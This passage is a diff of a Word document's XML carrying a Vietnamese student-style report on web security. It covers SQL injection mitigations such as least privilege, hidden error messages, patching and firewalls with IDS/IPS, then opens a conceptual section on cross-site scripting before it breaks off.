+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>dùng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> để mỗi t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ài</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> khoản kết nối đến cơ sở dữ liệu từ ứng dụng web chỉ nên có các quyền tối thiểu cần thiết. Tránh sử dụng tài khoản có quyền quản trị tối cao (sa).</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Cách này đảm bảo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> người dùng chỉ có thể truy cập vào dữ liệu họ cần để thực hiện công việc. Nhờ đó, bạn có thể bảo vệ dữ liệu nhạy cảm và mã của mình tốt hơn khỏi những kẻ xâm nhập.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Việc bảo mật cơ sở dữ liệu SQL đòi hỏi phải hạn chế hoặc hạn chế nghiêm ngặt quyền truy cập vào tài khoản quản trị</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Bằng cách thực hiện các biện pháp này, bạn có thể thực thi hiệu quả khái niệm đặc quyền tối thiểu , giảm nguy cơ tấn công mạng, ngăn chặn truy cập trái phép và giảm tác động của các mối đe dọa nội bộ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Nếu bạn quản lý tài khoản quản trị cẩn thận và chú ý đến bất kỳ dấu hiệu bất thường nào, bạn sẽ bảo mật tốt hơn hệ thống cơ sở dữ liệu SQL của mình</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> ADDIN ZOTERO_ITEM CSL_CITATION {"citationID":"WdAyyXX3","properties":{"formattedCitation":"[14]","plainCitation":"[14]","noteIndex":0},"citationItems":[{"id":151,"uris":["http://zotero.org/users/local/N9Vb2a9Q/items/4Y4SUFZT"],"itemData":{"id":151,"type":"webpage","abstract":"Read this practical technical guide about the 5 most common SQL injection attacks and how to prevent them. It packs real-life examples, mitigation steps &amp; more!","container-title":"Pentest-Tools.com","language":"vi","title":"Breaking down the 5 most common SQL injection attacks","URL":"https://pentest-tools.com/blog/sql-injection-attacks","accessed":{"date-parts":[["2025",10,4]]},"issued":{"date-parts":[["2024",4,29]]}}}],"schema":"https://github.com/citation-style-language/schema/raw/master/csl-citation.json"} </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="26"/>
+        </w:rPr>
+        <w:t>[14]</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Hơn thê nữa </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>h</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ạn chế thông báo lỗi chi tiế</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">t </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>là việc cần cân nhắc vì việc t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>hông nên hiển thị các thông báo lỗi cơ sở dữ liệu một cách trực tiếp cho ngườ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>i dùng</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> có thể tiết lộ cấu trúc của cơ sở dữ liệu và cung cấp thông tin hữu ích cho kẻ tấ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>n công.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Sau đó, ta nên </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -18831,28 +19741,187 @@
           <w:szCs w:val="28"/>
           <w:lang w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>ài đặt các module/plugin hỗ trợ:</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> đ</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="28"/>
-          <w:lang w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>ối với các mã nguồn mở như Joomla, có thể cài đặt thêm các plugin chống SQL Injection và các lỗ hổng khác để tăng cường bảo mật.</w:t>
-      </w:r>
+        <w:t>ập nhật và vá lỗi máy chủ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>một cách t</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>hường xuyên cập nhật các bản vá lỗi bảo mật cho máy chủ cơ sở dữ liệu và hệ điề</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>u hành.</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>Đảm bảo tất cả các ứng dụng phần mềm đều được cập nhật và vá lỗi bảo mật mới nhất . Điều này có thể khiến kẻ xấu khó khai thác lỗ hổng trong các chương trình lỗi thời.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Theo sau là việc </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ử dụng hệ thống tường lử</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve">a (Firewall) và IDS/IPS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ta có thể đ</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ặt máy chủ cơ sở dữ liệu sau hệ thống tường lửa để tránh tương tác trực tiếp. Các hệ thống IDS (Intrusion Detection System) và IPS (Intrusion Prevention System) như SNORT có thể giúp phát hiện và ngăn chặn các truy vấn khả</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="28"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> nghi.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="120" w:after="0" w:line="24" w:lineRule="atLeast"/>
+        <w:ind w:left="1080" w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:iCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Nguồn: </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId20" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+            <w:bCs/>
+            <w:iCs/>
+            <w:sz w:val="26"/>
+            <w:szCs w:val="26"/>
+          </w:rPr>
+          <w:t>https://pentest-tools.com/blog/sql-injection-attacks</w:t>
+        </w:r>
+      </w:hyperlink>
     </w:p>
     <w:p>
       <w:pPr>
@@ -18873,17 +19942,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:bookmarkStart w:id="17" w:name="_Toc208343449"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc208343449"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18894,7 +19953,7 @@
         </w:rPr>
         <w:t>Tấn công Cross-Site Scripting (XSS)</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="17"/>
+      <w:bookmarkEnd w:id="16"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -18939,6 +19998,7 @@
     <w:p>
       <w:pPr>
         <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:bCs/>
@@ -19086,8 +20146,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> XSS thường phát sinh từ việc ứng dụng web tin tưởng vào dữ liệu đầu vào của người dùng (từ ô tìm kiếm, form bình luận, URL,…) và hiển thị lại nó mà không có biện pháp kiểm tra lọc cẩn thận.</w:t>
       </w:r>
-      <w:bookmarkStart w:id="18" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="18"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -19104,9 +20162,224 @@
           <w:noProof/>
           <w:lang w:eastAsia="ja-JP"/>
         </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="275F6D2F" wp14:editId="39A8585C">
+            <wp:extent cx="3583814" cy="2168216"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
+            <wp:docPr id="6" name="Picture 6" descr="https://images.viblo.asia/b2faa243-e1aa-414a-bda6-84c2c731f379.png"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 1" descr="https://images.viblo.asia/b2faa243-e1aa-414a-bda6-84c2c731f379.png"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill rotWithShape="1">
+                    <a:blip r:embed="rId21">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect l="12968" t="4096" r="12181" b="5334"/>
+                    <a:stretch/>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3592060" cy="2173205"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                    <a:extLst>
+                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
+                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
+                      </a:ext>
+                    </a:extLst>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:left="720" w:firstLine="504"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>Kỹ thuật tấn công c</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>ho phép Hacker chèn những đoạn script độc hại (thường là Javascript hoặc HTML) vào website và thực thi trong trình duyệt của người dùng.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Kẻ tấn </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t>công có thể dùng XSS để gửi những đoạn script độc hại tới một người dùng bất kỳ để lấy cookie, keylogging hoặc tiến hành lừa đảo</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:bCs/>
+          <w:sz w:val="26"/>
+          <w:szCs w:val="26"/>
+        </w:rPr>
